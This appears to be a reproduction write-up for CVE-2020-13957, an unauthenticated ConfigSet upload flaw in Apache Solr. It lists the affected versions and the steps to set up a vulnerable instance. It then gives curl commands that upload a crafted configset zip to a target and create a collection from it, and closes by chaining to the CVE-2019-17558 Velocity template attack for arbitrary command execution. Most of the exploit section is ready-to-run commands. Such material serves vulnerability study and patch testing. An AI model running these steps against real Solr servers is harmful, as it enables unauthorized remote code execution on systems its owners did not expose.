Apache Solr RCE Unauthorized Upload Vulnerability CVE-2020-13957

Apache Solr RCE Unauthorized Upload Vulnerability CVE-2020-13957

Vulnerability Description

In a specific Solr version, the ConfigSet API has an unauthorized upload vulnerability, which can be exploited by an attacker to enable remote code execution.

Affect Version

Apache Solr 6.6.0 -6.6.5

Apache Solr 7.0.0 -7.7.3

Apache Solr 8.0.0 -8.6.2

Environment construction

Select a vulnerable version. Here the reproduction is Apache Solr 7.7.0 for reproduction. After downloading, execute the following command for environmental deployment.

cd solr-7.7.0
./bin/solr start -e cloud -force

Then turn on until it appears

Created collection 'gettingstarted' with 2 shard(s), 2 replica(s) with config-set 'gettingstarted'

Enabling auto soft-commits with maxTime 3 secs using the Config API

POSTing request to Config API: https://localhost:8983/solr/gettingstarted/config
{"set-property":{"updateHandler.autoSoftCommit.maxTime":"3000"}}
Successfully set-property updateHandler.autoSoftCommit.maxTime to 3000


SolrCloud example running, please visit: https://localhost:8983/solr

Visit https://xxx.xxx.xxx.xxx:8983/solr/ It’s normal

Vulnerability reappears

Download the target version of Solr on the attack machine and execute the following command to package the compressed file

solr-7.7.0/server/solr/configsets/sample_techproducts_configs/conf
zip -r - * > vuln.zip

Upload vuln.zip

curl -X POST --header "Content-Type:application/octet-stream" --data-binary @vuln.zip "https://xxx.xxx.xxx.xxx:8983/solr/admin/configs?action=UPLOAD&name=vuln"

The name parameter is the file name of the compressed package. Use the vulnerability to create a core

curl "https://xxx.xxx.xxx.xxx:8983/solr/admin/collections?action=CREATE&name=peiqi&numShards=1&replicationFactor=1&wt=xml&collection.configName=vuln"

</a-alert>

</a-alert>
Then use the Apache Solr Velocity template to remotely execute CVE-2019-17558 to execute any command